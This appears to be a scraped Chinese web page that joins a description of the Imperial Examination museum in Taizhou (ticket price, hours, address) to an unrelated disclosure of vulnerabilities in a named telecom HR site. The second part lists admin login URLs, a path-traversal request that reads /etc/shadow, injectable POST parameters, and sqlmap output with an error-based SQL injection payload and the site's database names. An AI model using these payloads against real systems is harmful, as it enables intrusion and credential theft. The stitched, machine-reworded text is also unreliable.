科举院试博物馆设在学政试院旧址,在清康熙至光绪年间,一直是扬属8县考生员(秀才)的试场,故又称“学政试院”。明清时代是江苏学政进行科举考试,考选扬州府所辖州县生童的地方。至少有101位学政在这里主持过三百多场考试。这里曾经名人辈出,文采飞扬 ...     [详细]
科举院试博物馆地处历史文化名城江苏省泰州市主城区中心。 泰州市,江苏省地级市,长江北岸水陆交通枢纽,新兴工业城市。位于扬州市与南通市之间,地处澛汀河、南官河与通扬运河交会,通扬公路经此,是里下河地区的入江门户。
门  票:成人票 30元/人
开放时间:8:00 - 17:30
地  址:泰州市海陵区府前路2号
传真号码:0523-86232827
联系电话:0523-86232827 86232869
博物馆动态

中邦电信某站SQL注入+文件包括漏洞

中邦电信某站SQL注入+文件包括漏洞

后台一:https://rs.hntelecom.net.cn/HRSystem/initIndex.do

后台二:https://rs.hntelecom.net.cn/loginadmin.do?m=login

漏洞类型一:

文件包括:rs.hntelecom.net.cn/filedown.do?m=filedown&path=http://www.2cto.com/../..//../..//../..//../..//../..//etc/shadow%00

 

中国电信某站SQL注入+文件蕴含漏洞

看到没有,root权限的哦

漏洞类型二:

地点:rs.hntelecom.net.cn/search.do?m=search

post数据:sss=test&Submit=%cb%d1%20%cb%f7&ttt=test

地点:rs.hntelecom.net.cn/searchD.do?m=searchD

post数据:sss=test&Submit=%cb%d1%20%cb%f7&ttt=test

话说2个地点都是相同功能,搞出2个成心思吗
 

sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: POST Parameter: ttt Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: sss=1&Submit=�� ��&ttt=1' AND (SELECT 7373 FROM(SELECT COUNT(*),CONCAT(CHAR(58,114,108,100,58),(SELECT (CASE WHEN (7373=7373) THEN 1 ELSE 0 END)),CHAR(58,111,112,99,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) AND 'JyFl'='JyFl --- available databases [4]: [*] information_schema [*] manpower [*] test [*] yiqilaifinddifferences
修复方案:

不继续深刻,保存进一步渗入危害。